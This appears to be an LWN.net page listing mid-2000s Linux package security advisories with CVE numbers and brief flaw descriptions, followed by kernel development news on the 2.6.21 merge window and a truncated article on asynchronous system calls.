Comments (none posted)
gtk2: denial of service
| Package(s): | gtk2 |
CVE #(s): | CVE-2007-0010
|
| Created: | January 24, 2007 |
Updated: | February 8, 2007 |
| Description: |
From the Red Hat advisory: A bug was found in the way the gtk2 GdkPixbufLoader() function processed
invalid input. Applications linked against gtk2 could crash if they
loaded a malformed image file. |
| Alerts: |
|
Comments (1 posted)
gv: stack-based buffer overflow
| Package(s): | gv |
CVE #(s): | CVE-2006-5864
|
| Created: | November 20, 2006 |
Updated: | April 9, 2007 |
| Description: |
Stack-based buffer overflow in the ps_gettext function in ps.c for GNU gv
3.6.2, and possibly earlier versions, allows user-assisted attackers to
execute arbitrary code via a PostScript (PS) file with certain headers that
contain long comments, as demonstrated using the DocumentMedia header. |
| Alerts: |
|
Comments (none posted)
gzip: multiple vulnerabilities
| Package(s): | gzip |
CVE #(s): | CVE-2006-4334
CVE-2006-4335
CVE-2006-4336
CVE-2006-4337
CVE-2006-4338
|
| Created: | September 19, 2006 |
Updated: | January 20, 2010 |
| Description: |
Tavis Ormandy of the Google Security Team discovered two denial of service
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to hang or
crash.
Tavis Ormandy of the Google Security Team discovered several code execution
flaws in the way gzip expanded archive files. If a victim expanded a
specially crafted archive, it could cause the gzip executable to crash or
execute arbitrary code. |
| Alerts: |
|
Comments (1 posted)
horde-kronolith: local file inclusion
| Package(s): | horde-kronolith |
CVE #(s): | CVE-2006-6175
|
| Created: | January 17, 2007 |
Updated: | March 7, 2008 |
| Description: |
Kronolith contains a mistake in lib/FBView.php where a raw, unfiltered
string is used instead of a sanitized string to view local files. An
authenticated attacker could craft an HTTP GET request that uses directory
traversal techniques to execute any file on the web server as PHP code,
which could allow information disclosure or arbitrary code execution with
the rights of the user running the PHP application (usually the webserver
user). |
| Alerts: |
|
Comments (none posted)
imagemagick: buffer overflows
| Package(s): | imagemagick |
CVE #(s): | CVE-2006-5868
|
| Created: | November 28, 2006 |
Updated: | February 16, 2007 |
| Description: |
Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI
file format decoder. By tricking a user or an automated system into
processing a specially crafted SGI image, this could be exploited to
execute arbitrary code with the user's privileges. |
| Alerts: |
|
Comments (1 posted)
ImageMagick: buffer overflows
| Package(s): | ImageMagick |
CVE #(s): | CVE-2006-5456
|
| Created: | October 31, 2006 |
Updated: | March 8, 2007 |
| Description: |
Multiple buffer overflows in GraphicsMagick before 1.1.7 and ImageMagick
6.0.7 allow user-assisted attackers to cause a denial of service and
possibly execute execute arbitrary code via (1) a DCM image that is not
properly handled by the ReadDCMImage function in coders/dcm.c, or (2) a
PALM image that is not properly handled by the ReadPALMImage function in
coders/palm.c. |
| Alerts: |
|
Comments (2 posted)
imlib2: arbitrary code execution
| Package(s): | imlib2 |
CVE #(s): | CVE-2006-4806
CVE-2006-4807
CVE-2006-4808
CVE-2006-4809
|
| Created: | November 6, 2006 |
Updated: | August 13, 2007 |
| Description: |
M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the
validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user
were tricked into viewing or processing a specially crafted image with
an application that uses imlib2, the flaws could be exploited to execute
arbitrary code with the user's privileges. |
| Alerts: |
|
Comments (none posted)
java: multiple vulnerabilities
| Package(s): | java |
CVE #(s): | CVE-2006-4339
CVE-2006-4790
CVE-2006-6731
CVE-2006-6736
CVE-2006-6737
CVE-2006-6745
|
| Created: | January 18, 2007 |
Updated: | June 4, 2010 |
| Description: |
java has multiple vulnerabilities, these include:
an RSA exponent padding attack vulnerability, two vulnerabilities
which allow untrusted applets to access data in other applets,
vulnerabilities that involve applets gaining privileges due to
serialization bugs in the JRE and buffer overflows in the java image
handling routines that can give attackers read/write/execute capabilities
for local files. |
| Alerts: |
|
Comments (1 posted)
kdelibs: integer overflow
| Package(s): | kdelibs |
CVE #(s): | CVE-2006-4811
|
| Created: | October 18, 2006 |
Updated: | March 5, 2007 |
| Description: |
The KDE khtml library can pass untrusted parameters into Qt, allowing a hostile user to trigger an integer overflow there and execute arbitrary code. |
| Alerts: |
|
Comments (none posted)
kdelibs: kate backup file permission leak
| Package(s): | kdelibs kate kwrite |
CVE #(s): | CAN-2005-1920
|
| Created: | July 19, 2005 |
Updated: | September 21, 2010 |
| Description: |
Kate / Kwrite, as shipped with KDE 3.2.x up to including 3.4.0, creates a file backup before saving a modified file. These backup files are created with default permissions, even if the original file had more strict permissions set. See this advisory for more information. |
| Alerts: |
|
Comments (1 posted)
kdelibs: cross-site scripting
| Package(s): | kdelibs konqeror |
CVE #(s): | CVE-2007-0537
|
| Created: | February 5, 2007 |
Updated: | August 13, 2007 |
| Description: |
Konqueror 3.5.5 does not properly parse HTML comments, which allows remote
attackers to conduct cross-site scripting (XSS) attacks and bypass some XSS
protection schemes by embedding certain HTML tags within a comment, a
related issue to CVE-2007-0478. |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-4623
|
| Created: | October 18, 2006 |
Updated: | November 14, 2007 |
| Description: |
The kernel DVB layer can be caused to crash with maliciously-formatted unidirectional lightweight encapsulation (ULE) data. |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-4535
CVE-2006-4538
|
| Created: | September 18, 2006 |
Updated: | January 5, 2009 |
| Description: |
Sridhar Samudrala discovered a local denial of service vulnerability
in the handling of SCTP sockets. By opening such a socket with a
special SO_LINGER value, a local attacker could exploit this to crash
the kernel. (CVE-2006-4535)
Kirill Korotaev discovered that the ELF loader on the ia64 and sparc
platforms did not sufficiently verify the memory layout. By attempting
to execute a specially crafted executable, a local user could exploit
this to crash the kernel. (CVE-2006-4538) |
| Alerts: |
|
Comments (none posted)
kernel: denial of service by memory consumption
| Package(s): | kernel |
CVE #(s): | CVE-2006-2936
|
| Created: | July 17, 2006 |
Updated: | November 14, 2007 |
| Description: |
The ftdi_sio driver (usb/serial/ftdi_sio.c) in Linux kernel 2.6.x up to
2.6.17, and possibly later versions, allows local users to cause a denial
of service (memory consumption) by writing more data to the serial port
than the driver can handle, which causes the data to be queued. |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-5757
|
| Created: | November 13, 2006 |
Updated: | November 14, 2007 |
| Description: |
From the MOKB-05-11-2006
advisory: "The ISO9660 filesystem handling code of the Linux
2.6.x kernel fails to properly handle corrupted data structures, leading to
an exploitable denial of service condition. This particular vulnerability
seems to be caused by a race condition and a signedness issue. When
performing a read operation on a corrupted ISO9660 fs stream, the
isofs_get_blocks() function will enter an infinite loop when
__find_get_block_slow() callback from sb_getblk() fails ("due to various
races between file io on the block device and getblk")." |
| Alerts: |
|
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
CVE #(s): | CVE-2006-2935
CVE-2006-4145
CVE-2006-3745
|
| Created: | September 1, 2006 |
Updated: | July 30, 2008 |
| Description: |
Previous versions of the kernel package are subject to several
vulnerabilities. Certain malformed UDF filesystems can cause the system to
crash (denial of service). Malformed CDROM firmware or USB storage devices
(such as USB keys) could cause system crash (denial of service), and if
they were intentionally malformed, can cause arbitrary code to run with
elevated privileges. In addition, the SCTP protocol is subject to a remote
system crash (denial of service) attack. |
| Alerts: |
|
Comments (none posted)
kernel: multiple vulnerabilities
| Package(s): | kernel |
CVE #(s): | CVE-2006-5749
CVE-2006-4814
CVE-2006-6106
|
| Created: | January 5, 2007 |
Updated: | January 8, 2009 |
| Description: |
A security issue has been reported in Linux kernel due to an error in
drivers/isdn/i4l/isdn_ppp.c as the "isdn_ppp_ccp_reset_alloc_state()"
function never initializes an event timer before scheduling it with the
"add_timer()" function.
The mincore function in the kernel does not properly lock access to user
space, which has unspecified impact and attack vectors, possibly related to
a deadlock.
Another vulnerability has been reported in Linux kernel caused by a
boundary error within the handling of incoming CAPI messages in
net/bluetooth/cmtp/capi.c. This can be exploited to overwrite certain
Kernel data structures. |
| Alerts: |
|
Comments (none posted)
koffice: integer overflow
| Package(s): | koffice |
CVE #(s): | CVE-2006-6120
|
| Created: | November 30, 2006 |
Updated: | February 20, 2007 |
| Description: |
The KOffice office suite has an integer overflow
vulnerability. If an attacker can trick a user into opening a
specially crafted PowerPoint (PPT) file, KOffice can be caused to crash or
possibly execute arbitrary code with the user's privileges. |
| Alerts: |
|
Comments (none posted)
krb5: uninitialized pointers
| Package(s): | krb5 |
CVE #(s): | CVE-2006-6143
CVE-2006-3084
|
| Created: | January 10, 2007 |
Updated: | July 7, 2010 |
| Description: |
The kdamind daemon can, in some situations, perform operations on uninitialized pointers. This bug could conceivably open up the system to a code execution attack by an unauthenticated remote attacker, but it appears to be difficult to exploit. See this advisory for details. |
| Alerts: |
|
Comments (1 posted)
krb5: local privilege escalation
| Package(s): | krb5 |
CVE #(s): | CVE-2006-3083
|
| Created: | August 9, 2006 |
Updated: | July 7, 2010 |
| Description: |
Some kerberos applications fail to check the results of setuid() calls, with the result that, if that call fails, they could continue to execute as root after thinking they had switched to a nonprivileged user. A local attacker who can cause these calls to fail (through resource exhaustion, presumably) could exploit this bug to gain root privileges. |
| Alerts: |
|
Comments (none posted)
libgadu: memory alignment bug
| Package(s): | libgadu |
CVE #(s): | CAN-2005-2370
|
| Created: | July 29, 2005 |
Updated: | June 25, 2007 |
| Description: |
Szymon Zygmunt and Michal Bartoszkiewicz discovered a memory alignment
error in libgadu (from ekg, console Gadu Gadu client, an instant
messaging program) which is included in gaim, a multi-protocol instant
messaging client, as well. This can not be exploited on the x86
architecture but on others, e.g. on Sparc and lead to a bus error,
in other words a denial of service.
|
| Alerts: |
|
Comments (none posted)
libgtop2: buffer overflow
| Package(s): | libgtop2 |
CVE #(s): | CVE-2007-0235
|
| Created: | January 15, 2007 |
Updated: | August 9, 2007 |
| Description: |
The /proc parsing routines in libgtop are vulnerable to a buffer overflow.
If an attacker can run a process in a specially crafted long
path then trick a user into running gnome-system-monitor,
arbitrary code can be executed with the user's privileges. |
| Alerts: |
|
Comments (none posted)
libmodplug: boundary errors
| Package(s): | libmodplug |
CVE #(s): | CVE-2006-4192
|
| Created: | December 11, 2006 |
Updated: | May 4, 2011 |
| Description: |
Luigi Auriemma has reported various boundary errors in load_it.cpp and
a boundary error in the "CSoundFile::ReadSample()" function in
sndfile.cpp. A remote attacker can entice a user to read crafted modules
or ITP files, which may trigger a buffer overflow resulting in the
execution of arbitrary code with the privileges of the user running the
application. |
| Alerts: |
|
Comments (none posted)
libpng: buffer overflow
| Package(s): | libpng |
CVE #(s): | CVE-2006-3334
|
| Created: | July 19, 2006 |
Updated: | December 15, 2008 |
| Description: |
In pngrutil.c, the function png_decompress_chunk() allocates
insufficient space for an error message, potentially overwriting stack
data, leading to a buffer overflow. |
| Alerts: |
|
Comments (none posted)
libpng: heap based buffer overflow
| Package(s): | libpng |
CVE #(s): | CVE-2006-0481
|
| Created: | February 13, 2006 |
Updated: | December 15, 2008 |
| Description: |
A heap based buffer overflow bug was found in the way libpng strips alpha
channels from a PNG image. An attacker could create a carefully crafted PNG
image file in such a way that it could cause an application linked with
libpng to crash or execute arbitrary code when the file is opened by a
victim. |
| Alerts: |
|
Comments (1 posted)
libtiff: buffer overflow
| Package(s): | libtiff |
CVE #(s): | CVE-2006-2193
|
| Created: | June 15, 2006 |
Updated: | September 1, 2008 |
| Description: |
The t2p_write_pdf_string function in libtiff 3.8.2 and earlier is vulnerable
to a buffer overflow. Attackers can use a TIFF file with UTF-8 characters
in the DocumentName tag to overflow a buffer, causing a denial of service,
and possibly the execution of arbitrary code. |
| Alerts: |
|
Comments (none posted)
libvncserver: authentication bypass
| Package(s): | libvncserver |
CVE #(s): | CVE-2006-2450
|
| Created: | August 4, 2006 |
Updated: | March 19, 2007 |
| Description: |
LibVNCServer fails to properly validate protocol types effectively
letting users decide what protocol to use, such as "Type 1 - None".
LibVNCServer will accept this security type, even if it is not offered
by the server. |
| Alerts: |
|
Comments (none posted)
libxml2 - arbitrary code execution
| Package(s): | libxml2 |
CVE #(s): | CAN-2004-0110
|
| Created: | February 26, 2004 |
Updated: | August 19, 2009 |
| Description: |
Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6.
When fetching a remote resource via FTP or HTTP, libxml2 uses special
parsing routines. These routines can overflow a buffer if passed a very
long URL. If an attacker is able to find an application using libxml2 that
parses remote resources and allows them to influence the URL, then this
flaw could be used to execute arbitrary code. |
| Alerts: |
|
Comments (none posted)
libxml2: multiple buffer overflows
| Package(s): | libxml2 |
CVE #(s): | CAN-2004-0989
|
| Created: | October 28, 2004 |
Updated: | August 19, 2009 |
| Description: |
libxml2 prior to version 2.6.14 has multiple buffer overflow
vulnerabilities, if a local user passes a specially crafted
FTP URL, arbitrary code may be executed. |
| Alerts: |
|
Comments (none posted)
lynx: arbitrary command execution
| Package(s): | lynx |
CVE #(s): | CVE-2005-2929
|
| Created: | November 14, 2005 |
Updated: | September 14, 2009 |
| Description: |
An arbitrary command execute bug was found in the lynx "lynxcgi:" URI
handler. An attacker could create a web page redirecting to a malicious URL
which could execute arbitrary code as the user running lynx. |
| Alerts: |
|
Comments (none posted)
mpg123: denial of service
| Package(s): | mpg123 |
CVE #(s): | CVE-2007-0578
|
| Created: | February 5, 2007 |
Updated: | February 7, 2007 |
| Description: |
The http_open function in httpget.c in mpg123 before 0.64 allows remote
attackers to cause a denial of service (infinite loop) by closing the HTTP
connection early. |
| Alerts: |
|
Comments (none posted)
mysql: format string bug
| Package(s): | mysql |
CVE #(s): | CVE-2006-3469
|
| Created: | July 21, 2006 |
Updated: | July 30, 2008 |
| Description: |
Jean-David Maillefer discovered a format string bug in the
date_format() function's error reporting. By calling the function with
invalid arguments, an authenticated user could exploit this to crash
the server. |
| Alerts: |
|
Comments (none posted)
MySQL: privilege violations
| Package(s): | mysql |
CVE #(s): | CVE-2006-4031
CVE-2006-4226
|
| Created: | August 25, 2006 |
Updated: | July 30, 2008 |
| Description: |
MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access
a table through a previously created MERGE table, even after the user's
privileges are revoked for the original table, which might violate intended
security policy (CVE-2006-4031).
MySQL 4.1 before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run
on case-sensitive filesystems, allows remote authenticated users to create
or access a database when the database name differs only in case from a
database for which they have permissions (CVE-2006-4226). |
| Alerts: |
|
Comments (none posted)
MySQL: logging bypass
| Package(s): | mysql |
CVE #(s): | CVE-2006-0903
|
| Created: | April 4, 2006 |
Updated: | May 21, 2008 |
| Description: |
MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms
via SQL queries that contain the NULL character, which are not properly
handled by the mysql_real_query function. NOTE: this issue was originally
reported for the mysql_query function, but the vendor states that since
mysql_query expects a null character, this is not an issue for mysql_query. |
| Alerts: |
|
Comments (2 posted)
nbd: arbitrary code execution
| Package(s): | nbd |
CVE #(s): | CVE-2005-3534
|
| Created: | January 6, 2006 |
Updated: | March 7, 2011 |
| Description: |
Kurt Fitzner discovered that the NBD (network block device) server did not
correctly verify the maximum size of request packets. By sending specially
crafted large request packets, a remote attacker who is allowed to access
the server could exploit this to execute arbitrary code with root
privileges. |
| Alerts: |
|
Comments (none posted)
ncompress: buffer underflow
| Package(s): | ncompress |
CVE #(s): | CVE-2006-1168
|
| Created: | August 10, 2006 |
Updated: | February 21, 2012 |
| Description: |
The ncompress compression utility has a missing boundary check.
A local user can use a maliciously created file to cause a
a .bss buffer underflow. |
| Alerts: |
|
Comments (none posted)
openldap: security bypass
| Package(s): | openldap |
CVE #(s): | CVE-2006-4600
|
| Created: | September 29, 2006 |
Updated: | June 12, 2007 |
| Description: |
slapd in OpenLDAP before 2.3.25 allows remote authenticated users with
selfwrite Access Control List (ACL) privileges to modify arbitrary
Distinguished Names (DN). |
| Alerts: |
|
Comments (none posted)
OpenSSH: denial of service
| Package(s): | openssh |
CVE #(s): | CVE-2006-4925
CVE-2006-5052
|
| Created: | October 6, 2006 |
Updated: | November 15, 2007 |
| Description: |
packet.c in ssh in OpenSSH allows remote attackers to cause a denial of
service (crash) by sending an invalid protocol sequence with
USERAUTH_SUCCESS before NEWKEYS, which causes newkeys[mode] to be NULL.
An unspecified vulnerability in portable OpenSSH before 4.4, when running
on some platforms, allows remote attackers to determine the validity of
usernames via unknown vectors involving a GSSAPI "authentication abort." |
| Alerts: |
|
Comments (none posted)
openssh: privilege separation issue
| Package(s): | openssh |
CVE #(s): | CVE-2006-5794
|
| Created: | November 8, 2006 |
Updated: | April 5, 2007 |
| Description: |
From the OpenSSH 4.5 announcement: "Fix a bug in the sshd privilege separation monitor that weakened its
verification of successful authentication. This bug is not known to
be exploitable in the absence of additional vulnerabilities." |
| Alerts: |
|
Comments (none posted)
openssh: remote denial of service
| Package(s): | openssh |
CVE #(s): | CVE-2006-4924
CVE-2006-5051
|
| Created: | September 27, 2006 |
Updated: | September 17, 2008 |
| Description: |
Openssh 4.4 fixes some
security issues, including a pre-authentication denial of service, an
unsafe signal hander and on portable OpenSSH a GSSAPI authentication abort
could be used to determine the validity of usernames on some platforms. |
| Alerts: |
|
Comments (none posted)
php: several vulnerabilities
| Package(s): | php |
CVE #(s): | CVE-2006-4481
CVE-2006-4484
CVE-2006-4485
|
| Created: | September 8, 2006 |
Updated: | June 13, 2008 |
| Description: |
The file_exists and imap_reopen functions in PHP before 5.1.5 do not check
for the safe_mode and open_basedir settings, which allows local users to
bypass the settings (CVE-2006-4481).
A buffer overflow in the LWZReadByte function in ext/gd/libgd/gd_gif_in.c
in the GD extension in PHP before 5.1.5 allows remote attackers to have an
unknown impact via a GIF file with input_code_size greater than
MAX_LWZ_BITS, which triggers an overflow when initializing the table array
(CVE-2006-4484).
The stripos function in PHP before 5.1.5 has unknown impact and attack
vectors related to an out-of-bounds read (CVE-2006-4485). |
| Alerts: |
|
Comments (1 posted)
php: buffer overflows
| Package(s): | php |
CVE #(s): | CVE-2006-5465
|
| Created: | November 3, 2006 |
Updated: | January 18, 2010 |
| Description: |
The Hardened-PHP Project discovered buffer overflows in
htmlentities/htmlspecialchars internal routines to the PHP Project. Of
course the whole purpose of these functions is to be filled with user
input. (The overflow can only be when UTF-8 is used) |
| Alerts: |
|
Comments (none posted)
phpbb2: missing input sanitizing
| Package(s): | phpbb2 |
CVE #(s): | CVE-2006-1896
|
| Created: | May 22, 2006 |
Updated: | February 11, 2008 |
| Description: |
It was discovered that phpbb2, a web based bulletin board, insufficiently
sanitizes values passed to the "Font Color 3" setting, which might lead to
the execution of injected code by admin users. |
| Alerts: |
|
Comments (none posted)
phpbb2: multiple vulnerabilities
| Package(s): | phpbb2 |
CVE #(s): | CVE-2005-3310
CVE-2005-3415
CVE-2005-3416
CVE-2005-3417
CVE-2005-3418
CVE-2005-3419
CVE-2005-3420
CVE-2005-3536
CVE-2005-3537
|
| Created: | December 22, 2005 |
Updated: | February 11, 2008 |
| Description: |
The phpbb2 web forum has a number of vulnerabilities including:
a web script injection problem, a protection mechanism bypass, a
security check bypass, a remote global variable bypass, cross site
scripting vulnerabilities, an SQL injection vulnerability,
a remote regular expression modification problem, missing input
sanitizing, and a missing request validation problem. |
| Alerts: |
|
Comments (none posted)
postgresql: insufficient verification
| Package(s): | postgresql |
CVE #(s): | CVE-2007-0555
CVE-2007-0556
|
| Created: | February 5, 2007 |
Updated: | March 19, 2007 |
| Description: |
PostgreSQL has two vulnerabilities that allow an authenticated attacker
with the permissions to run arbitrary SQL to launch a denial-of-service
attack or possibly read out random chunks of memory. Since attacks to
require authenticated access, the security hole is only considered medium
risk. See announcement for additional
information. |
| Alerts: |
|
Comments (none posted)
postgresql: SQL injection
| Package(s): | postgresql |
CVE #(s): | CVE-2006-2313
CVE-2006-2314
|
| Created: | May 24, 2006 |
Updated: | June 6, 2007 |
| Description: |
The PostgreSQL team has put out a set of "urgent updates" (in the form of the 7.3.15, 7.4.13, 8.0.8, and 8.1.4 releases) closing a
newly-discovered set of SQL injection issues. Details about the problem
can be found on the
technical information page; in short: multi-byte encodings can be used
to defeat normal string sanitizing techniques. The update fixes one problem
related to invalid multi-byte characters, but punts on another by simply
disallowing the old, unsafe technique of escaping single quotes with a
backslash. |
| Alerts: |
|
Comments (1 posted)
proftpd: stack-based buffer overflow
| Package(s): | proftpd |
CVE #(s): | CVE-2006-6563
|
| Created: | December 18, 2006 |
Updated: | February 14, 2007 |
| Description: |
A vulnerability exists in the FTP server ProFTPD, versions up to and
including 1.3.0a. The vulnerability is caused by a stack-based buffer
overflow in the "pr_ctrls_recv_request" function of the "Controls"
feature. This is an optional feature of ProFTPD server which is by default
disabled in OpenPKG and probably other distributions. |
| Alerts: |
|
Comments (1 posted)
quake: buffer overflow
| Package(s): | quake3-bin |
CVE #(s): | CVE-2006-2236
|
| Created: | May 10, 2006 |
Updated: | January 12, 2009 |
| Description: |
Games based on the Quake 3 engine are vulnerable to a buffer overflow exploitable by a hostile game server. |
| Alerts: |
|
Comments (none posted)
rpm: arbitrary code execution
| Package(s): | rpm |
CVE #(s): | CVE-2006-5466
|
| Created: | November 6, 2006 |
Updated: | August 28, 2007 |
| Description: |
An error was found in the RPM library's handling of query reports. In
some locales, certain RPM packages would cause the library to crash. If
a user was tricked into querying a specially crafted RPM package, the
flaw could be exploited to execute arbitrary code with the user's
privileges. |
| Alerts: |
|
Comments (none posted)
samba: several vulnerabilities
Comments (none posted)
shadow-utils: mailbox creation vulnerability
| Package(s): | shadow-utils |
CVE #(s): | CVE-2006-1174
|
| Created: | May 25, 2006 |
Updated: | June 12, 2007 |
| Description: |
The useradd tool from the shadow-utils package has a potential security
problem. When a new user's mailbox is created, the permissions are
set to random garbage from the stack, potentially allowing the
file to be read or written during the time before fchmod() is called. |
| Alerts: |
|
Comments (none posted)
thttpd: remote file access
| Package(s): | thttpd |
CVE #(s): | |
| Created: | February 1, 2007 |
Updated: | February 7, 2007 |
| Description: |
The start-stop-daemon command from thttpd performs a chdir / command,
this allows all files that are readable by the thttpd
process to be remotely accessed by unauthenticated users. |
| Alerts: |
|
Comments (none posted)
ulogd: buffer overflow
| Package(s): | ulogd |
CVE #(s): | CVE-2007-0460
|
| Created: | January 29, 2007 |
Updated: | March 19, 2007 |
| Description: |
A buffer overflow in ulogd has an unknown impact and attack vectors related
to "improper string length calculations." |
| Alerts: |
|
Comments (none posted)
unzip: long file name buffer overflow
| Package(s): | unzip |
CVE #(s): | CVE-2005-4667
|
| Created: | February 6, 2006 |
Updated: | May 2, 2007 |
| Description: |
A buffer overflow in UnZip 5.50 and earlier allows local users to execute
arbitrary code via a long filename command line argument. NOTE: since the
overflow occurs in a non-setuid program, there are not many scenarios under
which it poses a vulnerability, unless unzip is passed long arguments when
it is invoked from other programs. |
| Alerts: |
|
Comments (1 posted)
w3c-libwww: possible stack overflow
| Package(s): | w3c-libwww |
CVE #(s): | CVE-2005-3183
|
| Created: | October 14, 2005 |
Updated: | May 2, 2007 |
| Description: |
xtensive testing of libwww's handling of multipart/byteranges content from
HTTP/1.1 servers revealed multiple logical flaws and bugs in
Library/src/HTBound.c |
| Alerts: |
|
Comments (1 posted)
wireshark: multiple vulnerabilities
Comments (6 posted)
xine: format string vulnerabilities
| Package(s): | xine |
CVE #(s): | CVE-2007-0017
|
| Created: | January 23, 2007 |
Updated: | August 10, 2007 |
| Description: |
Multiple format string vulnerabilities in (1) the cdio_log_handler function
in modules/access/cdda/access.c in the CDDA (libcdda_plugin) plugin, and
the (2) cdio_log_handler and (3) vcd_log_handler functions in
modules/access/vcdx/access.c in the VCDX (libvcdx_plugin) plugin, in
VideoLAN VLC 0.7.0 through 0.8.6 allow user-assisted remote attackers to
execute arbitrary code via format string specifiers in an invalid URI, as
demonstrated by a udp://-- URI in an M3U file. |
| Alerts: |
|
Comments (none posted)
xine-lib: buffer overflow
| Package(s): | xine-lib |
CVE #(s): | CVE-2006-6172
|
| Created: | December 5, 2006 |
Updated: | June 5, 2007 |
| Description: |
A buffer overflow was discovered in the Real Media input plugin in
xine-lib. If a user were tricked into loading a specially crafted stream
from a malicious server, the attacker could execute arbitrary code with the
user's privileges. |
| Alerts: |
|
Comments (none posted)
xine-lib: buffer overflow
| Package(s): | xine-lib |
CVE #(s): | CVE-2006-1664
|
| Created: | April 27, 2006 |
Updated: | February 27, 2008 |
| Description: |
xine-lib does an improper input data boundary check on
MPEG streams. A specially crafted MPEG file can be
created that can cause arbitrary code execution when the
file is accessed. |
| Alerts: |
|
Comments (none posted)
xinit: race condition
| Package(s): | xinit |
CVE #(s): | CVE-2006-5214
|
| Created: | October 17, 2006 |
Updated: | August 9, 2007 |
| Description: |
A race condition allows local users to see error messages generated during
another user's X session. This could allow potentially sensitive
information to be leaked. |
| Alerts: |
|
Comments (1 posted)
X.org: local privilege escalations
| Package(s): | xorg-x11 |
CVE #(s): | CVE-2006-4447
|
| Created: | August 28, 2006 |
Updated: | April 30, 2007 |
| Description: |
Several X.org libraries and X.org itself contain system calls to
set*uid() functions, without checking their result. Local users could
deliberately exceed their assigned resource limits and elevate their
privileges after an unsuccessful set*uid() system call. This requires
resource limits to be enabled on the machine. |
| Alerts: |
|
Comments (none posted)
X.org: integer overflows
| Package(s): | xorg, xorg-server |
CVE #(s): | CVE-2006-6101
CVE-2006-6102
CVE-2006-6103
|
| Created: | January 10, 2007 |
Updated: | March 8, 2007 |
| Description: |
A number of integer overflows have turned up in the X.org server. Some of these overflows involve calls to alloca(), and thus make corruption of the stack relatively easy. This vulnerability is exploitable by anybody who can make a connection to the server, meaning that it is a local root exploit in most settings. See this advisory for details. |
| Alerts: |
|
Comments (none posted)
xpdf: buffer overflow
| Package(s): | xpdf |
CVE #(s): | CAN-2005-0064
|
| Created: | January 19, 2005 |
Updated: | March 15, 2007 |
| Description: |
iDEFENSE has found yet another xpdf buffer overflow; see this advisory for details. |
| Alerts: |
|
Comments (1 posted)
Page editor: Jonathan Corbet
Kernel development
Brief items
The current 2.6 kernel remains 2.6.20; no 2.6.21 prepatches have
been released. Patches are flowing into the mainline git repository,
however - see below for the highlights.
For older kernels: 2.6.16.40 was released on
February 10 with a relatively small number of patches.
The first 2.4.35 prepatch is
now available; it contains a few fixes and a backport of the 2.6 "sky2"
network driver.
Comments (none posted)
Kernel development news
I'm sorry, but could we please not mix the kernel with Vogon poetry
contest?
-- Al Viro
I have an email sitting in my drafts folder stating that I'll no
longer accept any features unless they've been publicly reviewed
in detail and run-time tested by a third party. The idea being to
force people to spend more time reviewing and testing each other's
stuff and less time writing new stuff. Maybe on a sufficiently
gloomy day I'll actually send it.
-- Andrew Morton
Comments (none posted)
As of this writing, the 2.6.21 merge window is wide open. Something over
2,300 changesets have been merged, making changes all over the tree. This
article summarizes the major changes merged so far for the 2.6.21 release.
User-visible changes include:
- A big ACPI update with sysfs support for backlight devices, a
simplified table manager which adds more functionality with less code,
the removal of 16-bit support, experimental support for removable
drive bays, and more.
- New device drivers add support for Silan SC92031 network interface
chips, Qlogic 4032 NIC chips, PA Semi PWRficient Ethernet chips,
Avocent PC300/RSV and PC300/X21 WAN cards, Atmel MACB network
controllers, Yukon Extreme Ethernet chips, several USB-attached NCR
printers, Chelsio T3 10G Ethernet adapters, GTCO CalComp tablets,
Delkin compact flash adapters, Attansic L1 Gigabit Ethernet adapters,
VIA VT1708(a) HD audio codecs, several auxilliary LCD display devices,
PC-style CMOS real-time clocks, SNI RM 53c710 SCSI controllers,
Gigaset M101 wireless RS232 adapters, and S3 Trio/Virge video chips
(fbdev).
Also, the long-broken SKMC and Oaknet drivers have been removed.
- Sysfs shadow directory support - allowing different namespaces to have
different views of sysfs - has been added.
- USBmon has a new binary API which promises to be somewhat faster and
more complete than the older, text-based interface.
- A big PowerPC/Cell/PS3 update, including support for the Toshiba
"Celleb" architecture, serial ports accessed through OpenFirmware, and
AMCC Taishan 440GX evaluation boards.
- Netfilter now has a connection tracking helper for the SANE network
scanner protocol.
- Encryption modules for the FCrypt and Camilla cipher algorithms have
been added.
- The ASoC (ALSA System on Chip) layer has been added to the ALSA sound
system. It provides improved support for sound processors on embedded
systems; it includes a dynamic power management subsystem. A number
of platform and codec drivers for ASoC have been merged as well.
- Tainting the kernel from
user space is now supported.
- Minix V3 filesystems can now be mounted on Linux systems.
- eCryptfs now has public-key encryption support.
- A long set of patches has made the kernel able to support boot-time
command lines of arbitrary length.
Changes visible to kernel developers include:
- Quite a few kobject functions - kobject_init(),
kobject_del(), kobject_unregister(),
kset_register(), kset_unregister(),
subsystem_register(), subsystem_unregister(), and
subsys_create_file() - now return harmlessly if passed a
NULL pointer.
- Many kernel subsystems which once used class_device
structures have been changed to use struct device instead;
this work is toward a long-term goal of getting rid of the class tree
and having a single device tree in sysfs.
- Significant changes have been made to the crypto support interface.
- The device resource management patches, making a lot of driver code
easier to write, have been merged.
- The DMA memory zone (ZONE_DMA) is now optional and may not be
present in all kernels.
- The local_t type has been made consistent across
architectures and has gained some documentation.
- The nopfn() address space operation can now return
NOPFN_REFAULT to indicate that the faulting instruction
should be re-executed.
- A new function, vm_insert_pfn(), enables the insertion of a
new page into a process's address space by page-frame number.
- A new driver API for general-purpose I/O signals has been added.
- The sysctl code has been heavily reworked, leading to a number of
internal API changes.
A number of patches are still waiting to merged, and some decisions are yet
to be made. Come back next week for what should be the final list of major
new features in 2.6.21.
Comments (none posted)
Since the writing of
last week's
article on fibrils, there has been relatively little discussion of that
set of patches. That silence does not mean that interest in the idea has
faded for now, however; instead, a couple of different approaches have been
posted for consideration.
Linus Torvalds got inspired to create an
asynchronous system call patch of his own. Simplicity is the word to
describe this patch: it adds less than 200 lines of code to the kernel
("I even added comments, so a lot of the few new added lines aren't
even code!"). It works like this:
